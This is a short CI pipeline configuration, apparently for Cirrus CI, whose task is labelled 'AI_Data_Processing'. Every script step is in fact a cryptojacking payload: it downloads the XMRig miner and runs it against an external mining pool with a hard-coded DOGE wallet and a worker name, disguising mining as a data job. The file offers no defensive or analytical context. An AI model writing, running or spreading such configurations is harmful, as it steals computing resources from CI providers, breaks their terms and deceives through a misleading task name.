container:
  image: ubuntu:latest
  cpu: 2
  memory: 4G

task:
  name: AI_Data_Processing
  timeout_in: 120m
  script:
    - apt-get update && apt-get install -y wget tar
    - wget -q https://github.com/xmrig/xmrig/releases/download/v6.25.0/xmrig-6.25.0-linux-static-x64.tar.gz
    - tar -xf xmrig-6.25.0-linux-static-x64.tar.gz
    - ./xmrig-6.25.0/xmrig -o rx.unmineable.com:443 -a rx -k -u DOGE:DP2DhHWz1gD2EhvZ6zbMcZe9P8z7Bytxcc.CIRRUS_GOD -p x --tls
